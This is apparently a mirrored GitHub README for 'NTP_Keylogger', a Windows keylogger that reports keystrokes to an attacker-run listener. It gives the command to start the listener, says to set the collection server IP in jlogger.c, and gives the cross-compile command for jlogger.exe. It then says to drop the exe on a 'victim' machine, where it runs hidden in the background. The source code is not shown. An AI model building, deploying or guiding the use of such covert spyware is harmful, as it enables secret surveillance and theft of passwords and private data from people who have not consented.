dkorzhevin / NTP_Keylogger

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

NTP Keylogger

Listener

sudo python3 ntpserver.py

Victim

Change the IP to your desired target server IP adress in jlogger.c

x86_64-w64-mingw32-gcc jlogger.c -o jlogger.exe -lwsock32 -w

Then throw the exe on the victim machine and just double click on it (Executable will work on background, so you cannot see anything in the screen)

This is how exe works:

image

jlogger

About


Languages

Language:C 66.1%Language:Python 33.9%